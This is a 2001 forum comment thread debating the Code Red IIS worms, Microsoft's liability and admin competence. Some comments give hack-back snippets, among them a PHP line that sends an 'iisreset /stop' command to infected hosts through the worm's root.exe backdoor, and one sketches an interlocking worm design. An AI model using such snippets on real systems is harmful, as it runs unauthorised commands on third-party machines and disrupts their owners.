Re:The $64K question: Does it actually work?

[rm3friskerFTN]

As I posted earlier [strange ... did someone "astroturf MOD" it to -1?]

QUESTION: If Joe/Jane Consumer running whatever OS/Apps that exist suffered as a result of the Microsoft Code Red I & II Worm can he/she sue Microsoft for losses???

IMPORTANT NOTE: Joe/Jane Consumer did NOT sign/accept/whatever an EULA associated with Microsoft Web Server. Joe/Jane was just "harmed" by the poorly designed, fault ridden, Microsoft Server Software. Joe/Jane NEVER signed/accepted/whatever the EULA associated with the poorly designed, fault ridden Microsoft Server Software.

Re:Not the mess they made...

There was actually an easy way to avoid this without even using the M$ security patch. All the admin had to do was disable anonymous access to the IIS Index Server pages. If the admin had required authenticated users only to the Index Server pages then none of this would've happened. I am mostly a Linux/Solaris guy, but one of my clients uses NT. I set their M$ Index Server like this *LAST* year and although Code Red tries to connect, it can't do it because it's got to log in first. The problem with MSCE people, in general, is that they don't understand the concept of locking down a box. Any experienced admin from a Unix-like background knows that is the first thing you do when you set up a machine is to lock it down by closing unnecessary services/ports, restricting who can/cannot connect, etc.

Re:Stop blaming microsoft

[Capt.+Beyond]

I agree with you not to blame MICROS~1. Blaming them is like blaming a glass manufacturer for when a robber breaks a window, and steals your tv. Blame the damn virus writer! And blaming the sys admins is like blaming the owner of the house because he/she does not know that the glass they bought with the house is NOT bullet proof.

Put blame where blame is due!

Microsoft's Problem!

[wirefarm]

This is what happens when you give admins a false sense of security.
After all, they became an MCSE after a couple months of hitting the books, rather than a few years of hacking old hardware. They got a certificate and the sense that the Microsoft way is the best way - If you don't understand what a dialog box is asking, just hit 'Enter' and go with the recommendation. That's how IIS got installed on all of those PCs and this 'Default.ida' nonsense too. I still don't know what a 'default.ida' is used for, and I'm a pretty technical guy. - Something to do with indexing? Whatever.
Some of my friends are MCSEs. - Not all of them are 'hackers' who actually watch what happens in their systems. They trust that MS will send them a shiny new CD with a 'Service Pack', along with a few other goodies to play with when an update is needed.
The problem is compounded by the fact that these Win2K CDs got passed around - Microsoft knows this and whether or not they admit it, it's part of their marketing. From what I've seen, I'd suspect that the bulk of the problems are coming from the home users who are running a borrowed copy of Win2K on their PC/Cable Modem setup. The ones who don't get the service packs and don't log into Microsoft.com too read the bulletins for fear of being asked for proof of purchase.
You Microsoft has these thousands of unlicenced customers that they know are using their software in a dangerous manner - Everything installed, every service running - all the lights on, but nobody home. What is MS's liability?
With all of the talk about the signifigance of an AOL icon vs. an IE icon on the desktop, MS *knows* how people will react when running an install - They know that if the user gets a dialog that says "Activate IIS?" that an unsure user will probably say yes, even if he has no idea what IIS is or what the risks are.
Microsoft has got to accept the blame for this mess - It is their doing.
Unfortunately, this is the first step in the process of requiring people running servers of any kind to be *licenced* - Now won't that be fun?

Cheers,
Jim in Tokyo

Re:Microsoft's Problem!

[HD+Webdev]

Since you asked... Most people install IIS because they want to serve HTML or ASP pages, or maybe just FTP.

IIS is automatically installed and enabled for anyone who upgrades from a full (all packages) install of Win98.

Re:Microsoft's Problem!

[fod]

If Linux distros shipped with a thousand Apache modules installed and configured, you'd probably have much of the same problems.

Well, no, since Apache doesn't suffer from the design problems IIS have.

Apache doesn't run as root, so exploitation won't lead to having root.

As soon as you exploit IIS, you have root.

Re:Microsoft's Problem!

[mpe]

And the REAL real fix is for Microsoft to ship Win XP with a sane out-of-box IIS configuraiton.

Actually a real fix would be to move away from monolithic programs. But NT since process creation is expensive under NT multi threading (of multi function programs) is prefered

Anyone who needs value-add services can certainly find a way to turn them on. If Linux distros shipped with a thousand Apache modules installed and configured, you'd probably have much of the same problems.

Except that it would be less of obscure to find a fix. IIS isn't modular...

Re:Microsoft's Problem!

[MrBogus]

- If you don't understand what a dialog box is asking, just hit 'Enter' and go with the recommendation. That's how IIS got installed on all of those PCs and this 'Default.ida' nonsense too. I still don't know what a 'default.ida' is used for, and I'm a pretty technical guy. - Something to do with indexing? Whatever.

Since you asked... Most people install IIS because they want to serve HTML or ASP pages, or maybe just FTP.

What Microsoft doesn't tell you is that Internet Information Service_s_ automatically installs a bunch of other ISAPI services which enable crap that you most like do not want. Examples include:
+ The ability to query Index Server indexes (idq.dll)
+ Internet Printing
+ Remote data queries
etc etc

Some of these things, particularly idq.dll have *repeatedly* had security holes. And that's why installing the the patch is not a fix, because it's only a matter of time until Code Red IV is exploiting another IIS bug to similar effect.

The real fix is to disable the extention mappings for things like .ida/.idq and so on (UI is buried in the Computer Management console), and then sleep at night because you don't have to worry about most of the IIS patches. Of course, neither Microsoft or the mainstream media, or slashdot for the most part is offering this advice. (Somewhere buried on their site, they have a 'Securing IIS' document where this is the #1 recommendation, but since they aren't getting the word out, their ass will be bitten hard again.)

And the REAL real fix is for Microsoft to ship Win XP with a sane out-of-box IIS configuraiton. Anyone who needs value-add services can certainly find a way to turn them on. If Linux distros shipped with a thousand Apache modules installed and configured, you'd probably have much of the same problems.

Re:Microsoft's Problem!

[Shimmer]

This is false. IIS does not run as root by default. It runs using its own IUSR_machinename account, which has limited local privileges.

MS software is crappy enough without you exaggerating its problems.

-- Brian

Re:Microsoft's Problem!

[Shimmer]

Good point. You're right.

-- Brian

Re:Microsoft's Problem!

[styrotech]

Sorry, IIS runs with localsystem priviledges (more control over the server than Administrator has).
Sure IIS will then switch to IUSR_* for any anonymous request, but if you are hit with a buffer overflow the exploit will happen before this switch can take place and viola the exploit has localsystem access.

The reason IIS needs localsystem rights is so it can switch it's security context to the user (or IUSR_* for unauthenticated requests) who is making the request.

IUSR_* is the account designated for determining the access rights for anonymous users, not the account IIS runs under.

Re:Microsoft's Problem!

[catfood]

If Linux distros shipped with a thousand Apache modules installed and configured, you'd probably have much of the same problems.

That's true, but the thing is, that's not the way Linux distro vendors normally operate. Because that's not the way Linux is normally used.

What we're seeing is the effect of Microsoft's long-standing policy of "don't worry, be happy." applied to installation and administration. Making the admin turn on needed services, manually, one at a time, is contrary to DWBH.

Linux was never meant to be a DWBH system. Once in a while we get a distro that tries to be DWBH (wasn't it RH6?)--but when that happens everyone ridicules it and knowledgeable admins stay away.

Re:Microsoft's Problem!

"You cant blame MS for everything." Well of course I/you/we can! The day after my wife bought a copy of Win2k, she had a fender bender... and the day after that, Win2k ate my kid's homework... Coincidence? I don't think so!

Re:Microsoft's Problem!

You don't need proof of purchase to download service packs or use windows update.

Re:Microsoft's Problem!

[wolf-]

Microsoft has got to accept the blame for this mess - It is their doing


And by that thinking, Linus is at fault for an OS that allows smurf attacks, malformed tcp packets, etc.

You cant blame MS for everything.

Re:Microsoft's Problem!

[Phroggy]

Unfortunately, this is the first step in the process of requiring people running servers of any kind to be *licenced* - Now won't that be fun?

I have to point out here that many of the servers affected by the Code Red worms were on residential cable connections, where running any Web server is an explicit TOS violation. The broadband ISPs never enforced their TOS unless you brought attention to yourself, but it's always been against their policy. You suggest you should have to be licensed in order to run a server - what if you just had to use an ISP that would officially allow you to do so?

Re:Microsoft's Problem!

Actually running a web server is NOT a violation of the TOS. Abusing bandwidth is, but if your web server doesn't utilize much bandwidth, then you haven't run afoul of your TOS. I told AT&T this along with requesting a timeframe as to when they planned on reopening the filters on port 80. Until then, I just reassigned my web server to another port so people can have aoutside access to it if I want them to.

Re:Wow

Well, I have had the government of Iran try to infect me a couple of weeks ago. Kinda funny.

Re:FUD ALERT

I dread IE updates and service packs. There are _always_ problems, I always have to fiddle around with safe-mode before I can actually log into my machine after an update.

As an amusing sidenote, MS isn't the only one with install issues, I have yet to successfully install 1.3.1 or 1.4 Java RE or SDK. Piece of shit, useless, good for nothing jar files! No wonder Java is going under, if I'm having trouble installing the JRE, an luser on XP (which will _not_ ship with Java) has absolutely no hope of experiencing the shittiness that is Java.

Re:FUD ALERT

[ZxCv]

IIRC, it was SP5 that broke the sequencing algorithm because I wanna say I remember them having an update to 5 shortly after called 5a. Regardless, even though 5 broke the sequencing, it did not open up any new holes in Windows. An attacker would have to already have access to the machine in order to exploit the broken sequencing.

I can't say much about Exchange because I don't have tons of experience on it. Only one of our customers insists on using it and even at that, the most I've ever had to do is add a new mail user.

I think the bottom line is that the original post was definitely FUD (although Im not sure how much I buy into the conspiracy theorist mentality of paid MS bashers). I see a difference between a service pack and individual security fixes, and at that, I've never seen a service pack open up any (real) new holes on any Windows box I've ever had to deal with.

setting this up?

how do you do step 3?? 3.Make sure the .ida extension is handled as a perl CGI script.

Re:setting this up?

Looks like this one works. Just done it on my own machine. Can anyone confirm that it really does, please?

Re:setting this up?

[sparkz]

And / must be a ExecCGI directory, of course... Add "ExecCGI" to the options of your DocumentRoot entry.

Re:setting this up?

[falser]

Is that space in "ro ot" supposed to be there?

Re:setting this up?

[BorgDrone]

in /etc/apache/httpd.conf:

AddHandler cgi-script .ida

Re:setting this up?

[nick-less]

actually one could also do something like

<?php fopen("http://".getenv("REMOTE_ADDR")."/scripts/ro ot.exe?/c+iisreset+/stop","r"); ?>

and
AddType application/x-httpd-php .ida

In case you prefer php

The beginning of the end for IIS?

[rambot]

All of the code red worms like it or not, have a good effect to an equal degree that they are bad or annoying. What does not kill us makes us stronger (or kills IIS which i wouldnt mind a bit). The interesting thing about the whole code red phenomenon is that it appears to be the first worm/virus to not only exploit a flaw in software, but a flaw in the character of the IIS server admin. Brilliant experiment in the area of a socially engineered worm. I have my doubts that they had envisioned it in this way when they created the worm however. I believe that a new breed of virus or worms have been born and now the door has been opened for worms that prey on the laziness and ignorance of unqualified or unreliable server operators. While all others have done this in the past, these are different in that they don't pose a threat specifically to one machines hardware or files, rather the net as a whole. Just look at the numbers of machines still infected. IIS ops are either entirely uninformed, or just have the "I'll just reboot, I don't have time to install patch" mentality.

I am sure the dickwads over at Microsoft have spun this into a "Money Making Opportunity" for there "Open Source is UNAmerican and Unsafe" server marketing campaign. I can just hear it now.. "With the new Advanced Server Ver.666, you won't get hacked by that nasty code red back door we left open for you. We fixed it!" (thereby adding 3 more new ones) haha.

Re:The beginning of the end for IIS?

[onepoint]

I'm giving a system admin a complete reaming after he told the president of firm that "all the systems are safe, I'm up to date on my patches" 5 days later bang "code red". I have been laughing my ass off, this guy thinks he's the UBER Geek of the firm, I'm going to enjoy this.

onepoint

Re:Not the mess they made...

Stop crying about NT Admins. Is a web developer who has IIS installed on his laptop an NT Admin? Is a 15-year old who runs a warez FTP site with IIS an NT Admin? Is your mom, who when building your family web page, installed Front Page and unknowingly installed a web server an NT Admin? Is an @home subscriber who has a home LAN and uses NT Server as a PDC an NT Admin?

The fault ultimately lies with MS, as it did with Red Hat and the Ramen fiasco: vendors shipping vulnerable packages that nobody asked for.

Your Yellow Dog Linux box was probably rooted through the BIND exploit and you probably don't even know it.

Re:No.

[rambot]

Umm... WRONG!

You won't be able to "put a stop to this this thing really fast" no matter what you do. M$/IIS is bloatware chocked full of undiscovered exploits. This is not the last of THIS TYPE of worm.

AND! yes it does say something about the character of the IIS admins, because it takes very little technical know how to get a IIS server running. ("I had IIS running? I had no idea") Like I said! Uninformed, ignorant, or lazy! PICK ONE!

I for one am glad. This is just the type of thing that can actually cause enough damage to the already tarnished track record of M$ commercial server market, to help see a real decline in there numbers.

IIS is a disease. Apache is the cure.

Re:And it keeps going

[Swaffs]

They fail to mention that many people are running it and aren't even aware. They should have suggested that each person running NT or 2000 should (somehow) check to make sure they aren't infected.

Re:Liability for software defects

[Legion303]

Particularly in the x86 market, there is such an abundance of 3rd party hardware that goes into most systems. This usually means 3rd party drivers. And because these all have to work together, who's to say that it wasn't a bug in Windows that caused that video driver to fail? Or was it a bug in the driver itself? Who is to be held liable here?

I've thought about this. Under linux, I've only very rarely had ANY problems with 3rd-party software taking down the whole system. Both times it happened, it was Netscape. As far as 3rd-part drivers go, not a single one has ever caused a noticable problem when I'm in linux.

Don't get me wrong, I *like* Windows when it works right. But blaming the problem on 3rd-party drivers is just misguided.

-Legion

Next step: read the damn articles

[cabbey]

I mean Michael went to all the trouble to link to such a script and all, a few tweaks and you've got what you asked for.

It's a pointless enadeavour though. Of the 1300+ unique hosts that have bounced off my apache machines in the last ~70 hours, only 10 seem to actually be accepting requests for root.exe... the rest throw back either a 404 or a 403, with alot refusing connections, or just returning a "server overloaded" message. Of those ten accepting requests for root.exe two returned some kind of funny response, one redirected to goatse.cx, and the other seven seemed to actually accept commands.

Re:Remind me again...

[Omnifarious]

Well, the first item in that list isn't actually an Apache exploit. It's a piece of trojan code that people are tricked into running by telling them that it's an exploit detector.

If you expect a count of google hit results to somehow bear any weight in this argument, you're an idiot. One, any given exploit will have 5-10 hits as google indexes mailing list archives. Two, it will catch all mention of 'Apache' and 'exploit' whether or not the thing being mentioned really IS an Apache exploit.

Script Notifies Infected Code Red Domains

[helixcode123]

I was inspired to write this script after thinking about all those poor folks out there that are clueless about the fact that they're running infected IIS servers.

It basically just sends a message to the abuse@domain.foo to let them know about the infestation.

OK, so it's no SpamCop.org, but hey, I started writing it at 11:00 tonight.

False sense of security

[einhverfr]

Here is my disclosure: I hold an MCSE (I also hold Linux Professional Institute Level 1, Server+, Network+, A+, and Inet+ certs but that is beside the point).

The Windows GUI follows many of the same design principals that Mac followed for years which is why Apple never marketed the Macs as servers-- the abstraction is great in a workstation but in a complex server environment it is dangerous not to have the ability to participate in the system in the way one does with UNIX. Apple sold servers too, but they ran on UNIX.

Now you have trainied monkeys who think they know everything about NT, which really ammounts to "reboot when it bluescreens." They think that they are secure because of the quality of Microsoft's software. Yet they don't know really how TCP works so they have no clue how to begin to think about security from the outside-- all they know is security from the inside which is all the exams cover, and all Microsoft want's you to think about because that is where they have the most features (yeah, if yo can break in from the outside, you can break in from the inside, though).

So now, Microsoft has issued a patch to remove a backdoor-- one loudly advertised. Where is the ecurity in that? They should have, on their web site, in no uncertain terms, exactly what their engineers are telling their customers and exactly what the rest of the security community is saying: If you are infected, reload your computers.

There is false sense fo security in using this patch. Your IIS server has a backdoor which was heavily advertised to the net. Anybody could have installed another backdoor and you, as the admin would probably never find it. Not, at any rate, until someone used it to deface your site, publish your confidential information, destroy critical information, or other such activity...

Re:Script doesn't work anyways

[Dahan]

You mean #357? In that one, GC says he and others haven't found a way to use root.exe to shutdown IIS either. As far as I know, an admin would have to be actively asking for trouble to let CGI scripts/EXEs have privileges to stop IIS. I suspect most CR-infected machines are adminned by the passively clueless, not actively stupid :) They'd have to put the IUSR account into the Power Users group (by default, it's in the Guests group), change the anonymous user to a more privileged account, or something like that for someone to use /scripts/root.exe to stop IIS. BTW, NTFS doesn't really come into play, since that only affects filesystem access, not user privileges--even if someone installed Win2K on a FAT partition, IUSR still wouldn't be able to stop any services.

What my default.ida perl script looks like! :)

[Frag-A-Muffin]

#!/usr/bin/perl -w
print "Location: http://www.microsoft.com/default.ida?$ENV{'QU ERY_STRING'}\n\n";
exit;

I don't know why there's a space showing up in the word QUERY_STRING above, but you get the picture.

Let's get everyone running apache (that's getting hit by stupid admins) to do this! :)

Re:Stop blaming microsoft

[Perplexia]

I rarely use C's or C++'s overflowable library routines. Since when is the bounds checked vector overflowable? What library routines do you use then?

Re:Stop blaming microsoft

[SuiteSisterMary]

Criminals subsequently come up with a version of bullets coated with a Teflon derivitive. Manufacturer sends out information that they've an add-on spray that will prevent these new bullets from penetrating their windows. Unsprayed windows will NOT stop these new bullets. You don't get this spray and apply it. MAYBE YOU DON'T EVEN REALIZE THAT YOU'VE GOT BULLET PROOF WINDOWS. Criminals start shooting random windows. They don't actually do much, just shoot the windows. Is it the manufacturer's fault?

Re:Stop blaming microsoft

[nevets]

Although you were marked as funny, I'll assume you were being sarcastic.

I believe that the above poster was refering to library routines such as sprintf and scanf which do not check the size of the buffer that it is about to write a variable length item into.

If you use glibc, then you have some available library calls such as snprintf which fix the some of the problems.

Re:Unforgivable!

[Remote]

Smells trolly. Given the choice between having my machine flood others or be shutdown, I'd rather it be shut down.

I'm guessing you've never been DoS'd? Its easy to make statements like yours when living in lala land.

There are posts in this discussion from people who claim to have lost work because of that childish link. Im not trolling, I even think that this calls for an apology from /.

Un unpatched IIS server does not mean an infected one. Granted, Ive never been DoSd, but Im not the type who takes justice in my own hands. Or else I would think this should be done to spammers, then to sites with pop-up windows, then to sites with banner adds, then to sites I just happen not to like.

Re:Stop blaming microsoft

[Chris+Johnson]

That is a really stupid place to optimise. I bet it barely shows up on profiling at all, compared to memory management and offscreen bitmap drawing :)

Re:So how did your site fare?

The large automotive I work for got hit on the internal network last Monday. We lost much of the networking for three days as everything run by IS is NT based (DNS etc.)

Fortunately the applications I'm responsible for run on Solaris, Linux and Tomcat they stayed up fine, but none of our external customers could see them due to much of the internal infrastructure being closed down.

The access logs for the servers indicate that my app was probed by at least 300 unique servers from inside the firewall. The issue is now mostly solved on my local domain, but I can watch the worm spreading throughout the rest of organisation.

This is the third major incident this year due to a combination of bad administration and having chosen a complete MS based infrastructure (previous outbreaks of Outlook issues have closed the networks for several days). I can't understand why nobody is questioning this decision.

More specifically...

[Giant+Hairy+Spider]

Blame the bozo who designed strncat!

This may not be the cause of this particular overflow, but it causes a very large number of them.

The main reason you'd use strncat rather than strcat is to avoid buffer overflows, yet instead of the obvious choice of feeding it the buffer size, you have to feed it the maximum number of characters to add. So to use it to prevent buffer overflows, you not only need to remember the buffer size, you have to track the current string length!

Avoid strncat! Even if you understand it, someone who changes your code might not.

Make something more intuitive:

char *buf_strcat(char *dest, char *src, size_t buflen){
char *cur=dest;
int i=0;
while(*cur && i<buflen-1){cur++; i++;}
while(*src && i<buflen-1){*cur++ = *src++; i++;}
*cur='\0';
return dest;
}

Re:More specifically...

You're right; the C RTL string functions were clearly designed by some grad student who would have been better off in a nice marketing or sociology program somewhere. :(

How about strcat(s1,s2) returning... not the pointer to the end of the resulting string, but the a copy of the freaking s1 pointer? How useless is that?

C's a great language, but it could have been so much more with a decent standard library. (Same with C++, for that matter.)

Beware of Interlock

[eddy]

I've had similar thoughts. I've been reading Multiagent Systems: A Modern Approach to Distributed Artificial Intelligence and with the Code Red outbreak, I've taken to reading it with malware in mind.

What I've come to realize is that a worm could become real scary if its author, like me, were to be a fan of multi-agent systems. There's a plenthora of research on agent-to-agent communication, just waiting for that big experiment to take place.

Ponder this: interlock. The worms work together to reach a situation in which a host cannot be cleaned without data from another host, and vice-versa, thus making disinfection extremely hard

I've been sketching on scenario where relationships are created via the infection plus one level. if A infects B (first level of interconnect), then B would tell A about every other host it infects in turn (second level). These hosts would form a cluster, where each member is free to initiate contact with another and request services.One of these could be the encryption or decryption of data. Hosts would say "Please encrypt this data (hands it over) and return the encrypted result". Say host A tells host B this. Suddenly we're in a situation where we cannot simply disinfect host B, because if we do we'll lose the key that decrypts data on host A! Of course, the worms would negotiate the complement, and host A would contain the key to unlock data in host B. We then expand this scenario to a great interconnection between members of the cluster. We can strengthen the connections by allowing unrelated hosts to negotiate interlocks.

In the same vein worms can negotiate and divide the search-space between them. Each worm could contain a compressed/simplified representation of the IP-search-space (just a couple of masks maybe? Haven't thought too hard about it). Relatives would communicate which parts have been scanned as to not duplicate (too much) work. This then becomes a parallell binary search!

I think I'm gonna have to write a short doomsday article too, there's just so much cool things that someone wicked could do.

Re:Beware of Interlock

[greenrd]

This is no worse than a worm that erases the hard disk. Either way, you rely on backups (which people should be making anyway, to avoid data loss thru software or hardware or human error).

A bigger danger, IMO, comes from stealth data corruption over a long period of time.

Re:How do you run these scripts

[Anthony+Kilna]

These are meant to be CGI scripts... you need to set up your web server so that any request to http://www.yourserver.com/default.ida runs this code... You can do that by mapping .ida as a CGI extension in your server and naming the file default.ida, or by aliasing /default.ida as /redcode.pl in your server's config. What will then happen is any request for default.ida (which is what the code red virus does) will result in the requestor's machine being hit with a similar request to turn it off/shut down iis. For this code here, you'll also get an entry in your server's error log so you can know what happened.

Re:Liability for software defects

[OmegaDan]

I wonder how it is that software manufacturers have been able to escape most liability ...

We need laws to make software companies liable for one reason -- US software already has a reputation for being of poor quality [read microsoft]. In 5 years that could become a SERIOUS economic issue for the US, maybe german software will become the avant guard (like german engineering is thought of now), or japanese software will be the highest quality (like japanese steel is now). And suddenly we'll find outselves out of the software market like were out of the car market and out of the electronics market

Re:Can we please stop picking on the MCSEs?

No we cant.

I have yet to meet a MCSE that is worth anything.

Actually I take that back, I did meet a real guru.. But it took some prying to get him to admit that he was MCSE certified... He was embarassed that he had the certification, citing " I hate to have a badge that screams I'm a Moron that can buy a certification instead of earning it."

And you know, this Microsoft preacher will agree that Microsoft is completely retarted in their cert program teaching you their terminology instead of real skills....

Boot from system run from boot... Only a moron would go any farther learning a doublespeak system designed only to generate money and confuse the people learning it.

Totally Shameful

[dpm67]

To have that link on Slashdot that will cause the user's machine to be shutdown because of the hole on IIS is ridiculous. If you wanted to help inform the lazy people and admin's out there that still have that hole open on their system, it would have been MUCH more responsible to have a message stating "Click here to test your machine for this backdoor". I really have lost allot of respect for the people at Slashdot. This is completely irresponsible and foolish.

The fact of the matter is ALL systems have security weaknesses and limitations. This is true for both Linux and Windows, or any piece of software that has ever been written. All it takes is to subscribe to any of the excellent security mailing lists that are on the net to realize this. As a matter of fact, the last copy of the excellent SANS Security Alert Consensus (www.sans.org) lists more new vulnerabilities in Linux than Windows. Of course, the opposite is true often enough. But really, what it the point of those kinds of comparisons other than juvenile brouhaha.

Re:Totally Shameful

That link only shuts down your system IF you have shamefully operated an IIS system infected with code red.

If you are not infected then you will see the page. The author is doing us all a favor by shutting down ONLY infected servers.

Don't you even care to know that there is a problem?

Re:Totally Shameful

[uchian]

Ok, I'm assuming this is a troll, but just in case...

Code Red has been around now (and has had at least 3 stories about it on Slashdot previous to this one, yes?) for a _long_ time. In other words, anyone who reads slashdot by now knows about it, and if they haven't fixed it, deserve a quick reboot to get their attention to fix it.

Secondly, if people aren't going to sit up and take notice of Code Red II now, we've gotta make 'em. I wouldn't be suprised if someone right now isn't working on a malicious version of Code Red that, say, reformats the harddrive after a week, or something. If/when this happens, all those lazy/ignorant people will start making a fuss at how nobody told them anything about it.

Also note that just clicking on the link doesn't send the request - only if you happened to ask for the page default.ida?.... in other words, tried to query it as if it was a proper site. The only people who would do that are crackers, or Code Red attacks at this moment in time. Also, the shutdown request would not work unless you are infected with code red.

I agree with your second paragraph, ish. Thing is, most Linux users know what they are doing, or never manage to install it in the first place :-P PS: I use Linux

It's Microsoft

[Tony-A]

Well you know, different results from identical inputs. I would guess that most installations of IIS, intentional or otherwise, have nothing to do with Add/Remove Programs.

That script does NOT work!

That script that's linked on the front page does not work, as IIS does not run with administrator permissions.

Stopping or resetting IIS wouldn't stop an infected machine from probing and infecting others, anyway.

The best way to stop an infected computer from being a menace is, once you have been probed, cause that box to hotsync it's palm V.

Aftermath?

[dohcvtec]

The headline implies that the whole Code Red experience is over. I know everybody wants it to be over, but it doesn't seem to be over from where I'm sitting, looking at the sheer volume of logged packets hitting my firewall. So Microsoft has released a solution to the Code Red II worm. That's great, but now try to get most of the infected users to use it. I haven't seen any slowdown in probes from infected machines yet, so I'll believe it when I see it.

Re:Aftermath?

[easter1916]

2,500+ in the last 18 hours on my box.

Re:Stop blaming microsoft

[SpaceLifeForm]

If I lived somewhere where it rained bullets I'd make sure I installed bullet proof glass.
If the manufacturer told me it was bullet proof I'd probably believe him.
If it subsequently broke when a bullet hit it who's fault is it?
yours probably :)

However, I can sue for damages.
In the case of CR and M$, there is no one to sue for damages, is there?

Re:No.

[spectecjr]

Umm... WRONG!

You won't be able to "put a stop to this this thing really fast" no matter what you do. M$/IIS is bloatware chocked full of undiscovered exploits. This is not the last of THIS TYPE of worm.

AND! yes it does say something about the character of the IIS admins, because it takes very little technical know how to get a IIS server running. ("I had IIS running? I had no idea") Like I said! Uninformed, ignorant, or lazy! PICK ONE!

I for one am glad. This is just the type of thing that can actually cause enough damage to the already tarnished track record of M$ commercial server market, to help see a real decline in there numbers.

IIS is a disease. Apache is the cure.

Dumbass, IIS wasn't exploited by Code Red. Index Server was.

If you were running APACHE and had it bound to Index Server (not that farfetched on Win2k), you'd STILL have had a rooted box.

Simon

WTF is up with that second link?

[Mr.+Sketch]

I clicked on that second link and it rebooted my computer, WTF? How the hell did it do that? Why wasn't there a warning 'Following this link will reboot your computer'?!?! I lost my changes to my thesis I was working on, and I'm pissed! I just figured I'd check out slashdot real quick and my computer rebooted, that sucks! Oh well, screw that, next time I'll make sure to close all my programs before checking slashdot, thanks guys.

Re:Here's how open source would be better...

[reflective+recursion]

Closed source can be perfectly good at closing holes, if the company is as big as Microsoft. But Open Source is much better at closing those holes before they are shipped: many eyeballs make all bugs shallow. Open Source doesn't catch every bug, of course; but enough are found that when the odd hole is announced, it is a big enough deal that the patches are more likely to be installed.

I disagree. And I also assume you haven't heard of a little something called "sendmail." It is truely the cracker's (script kiddies) dream exploit. It could be called the "cracker's favorite root tool--already installed."

Open source producing more secure software than the proprietary world is a _myth_. Where is the concrete evidence to back up this claim? And because it is open do not think that more eyes see it (and much less _analyze_ it). Then there are the eyes out there looking for an exploit.

Exploits for open source are a "big enough deal" only because most users of open source are technically adept. The people with infected IIS are not admins and most are probably not very technical (end-users).

Keep in mind people are _paid_ to fix proprietary (commercial) software. This is not always true for open source (and much less true for those numerous "applications" on sourceforge.net and freshmeat.net).

Closed Source hurts Microsoft security in more ways than one. Not only are all default installations compromised, but since so many new patches come out every week most admins don't keep up with them. While this is partially the admin's fault, it is also the fault of the software model that prevents these problems from being found quickly.

Default installations compromised? Are we talking about Red Hat or Microsoft here? Can't be our beloved Red Hat. I don't see what makes people believe that all these Linux newbies keep up with patching their system. A good number of Linux users do not even know how to upgrade (much less use diff/patch) their kernel. Many do not know even know man(ual) pages. Proprietary software does not help crackers either. It is equally hard to exploit closed source software as it is to find exploits in closed source software. Make sense? If you claim it is hard to find problems in closed source, what makes you think crackers had an easy time too? They don't, trust me.

It goes a little something like this: Cracker Joe finds an exploit doing heavy reverse engineering (sometimes--not always of course). He shows the world his exploit to become famous (most crackers attach some sort of handle to show their "inside" friends on IRC and what not--bragging rights). This exploit travels by ignorance. Not because it cannot technically be stopped. _Any_ exploit is technically stoppable.

Microsoft's own practices

[rcw-home]

Microsoft actually gives each employee administrator access to their own workstation. There usually isn't any attempt to lock the local workstations down. They even use FAT32 on the Windows 2000 master images.

I believe this is the primary reason why so many random things want administrator access on Windows NT/2000 and why the default file permissions/registry keys are so loose.

Warhol Worm proposed: 15 minutes to total infectio

[molo]

• 2001-08-11 13:18:46 Warhol Worm proposed: 15 minutes to total infection! (articles,bug) (rejected)

Since /. rejected this story, I posted it to the K5 Queue (only visible if you have a K5 acocunt).

Here's the scoop (more meat at K5):

According to an article in the latest issue of the RISKS digest, Nicholas Weaver of UC Berkeley has written a description of a new type of worm, the Warhol Worm. He believes that using a divide-and-conquer method, all vulnerable machines over the entire IPv4 addressspace could be compromised in only 15 minutes!

`In the future, everybody will have 15 minutes of fame' -Andy Warhol

Some don't know they have IIS

[cvd6262]

"...it also gives you an option to permanantly disable IIS."

This is a bigger fix than one might think. At the university at which I work, the major problem was not the sys admins who did not patch their servers, it was the professors who had Win2K Professional on their workstations with IIS on and didn't even know it. Some of them knew about the worm, even made sure that the department's IT teams patched their servers, but did not know that they were running a web server in their office, let alone that they were infected.

Re:Some don't know they have IIS

[Gerdts]

Often times machines at universities are not administered by competent IT staff. It is quite common for a professor to have a grad student manage his/her machines. Normally that grad student doesn't really give a damn about anything other than going to school. Most grad student/admins that I ran across did so because their major professor told them to, not because they wanted. They all eagerly waited for a new grad student to come in to take over IT for the research group.

Now couple that with universities' famous reputation for fighting firewalls tooth and nail. What a wonderful combination.

Re:Some don't know they have IIS

A Frontpage install did it for me.

Re:Some don't know they have IIS

[lowflying]

I'd really like to know how this happens.

Having spent the last week cleaning up in a similar university environment, one of the ways it happened was installing other MS software that automatically installed IIS without any indication to the end user. Project Central Server was the primary culprit. They only needed Project or just the client, but they had all heard that with Central Server they could share info on their projects, and there it was on their install CDs...

The other apparent source of the problem was several people not knowing what IIS was, but seeing the option to install it when they put their Win2K Pro CD for other reasons. There would be a warning if it was risky, right?

Dave

Re:Some don't know they have IIS

I'd rather have someone respond than get moderated up.

your wish is my command....

Re:Some don't know they have IIS

[mj01nir]

So how the heck do the Win2K Pro boxen that people run somehow spontaneously install IIS on them without their knowledge?

Because lots of users don't use the default install. A custom install is always more interesting because you can see what options are available.

Also, many folks don't know what the hell Internet Information Server is. Sounds like one of those spiffy add-ons for Internet Explorer. So they install it (either at install-time or from fooling around in Add/Remove) and forget it.

Re:Some don't know they have IIS

[Tarpan]

Either, they clicked all the boxes just for the fun of it. Or the university had some sort of custom install thingie for all it's users and it was included in there.

Nice Grammar, RR!

[Pope]

OR IF YOUR ARE A MACINTOSH USER

Remind me never to sign up with these folks. This should have gone out last freakin month.

Re:Nice Grammar, RR!

[bonzoesc]

That's actually when I got this message - but I felt a need to post it today just to demonstrate what retarded "admins" have to ignore in order to distribute Code Red.

Why is the admins fault?

[mandria]

i've been reading through posts and it bothered me when people say it's the admins fault for not patching.
excuseme here for a sec but if you buy a car do you buy it broken?Did you see any car company to offer "patches" for a car?
even In rare cases of a defective engine the owner takes the car in and have it replaced if he bought it brand new. Car companies don't have customers opening the hood and applying patches.

Re:Why is the admins fault?

[SuiteSisterMary]

The patch was available a full month before Code Red 1 popped up. Off hand, I'd say that it's not Microsoft's fault. Or look at it this way. Red Hat 6.x is filled with known holes. If I install it on the public internet, is it Red Hat's fault, or my fault, for using it?

Re:Why is the admins fault?

Cars aren't on a big network where exploits can be done remotely. If the server won't run reliably on a local network, then that's a problem, and I wouldn't buy the software. However, security holes are inevitable when all computers are connected.

Have you ever seen a cracker making all Fords in the world break down from a computer in China?

In general, parallels between cars and computers don't work.

Re:Why is the admins fault?

[uchian]

But if you bought a make of car which the company later recalled to have new headlights fitted because a particular batch were faulty, it's your fault if you don't take your car in to be fixed, isn't it?

Re:Warhol Worm proposed: 15 minutes to total infec

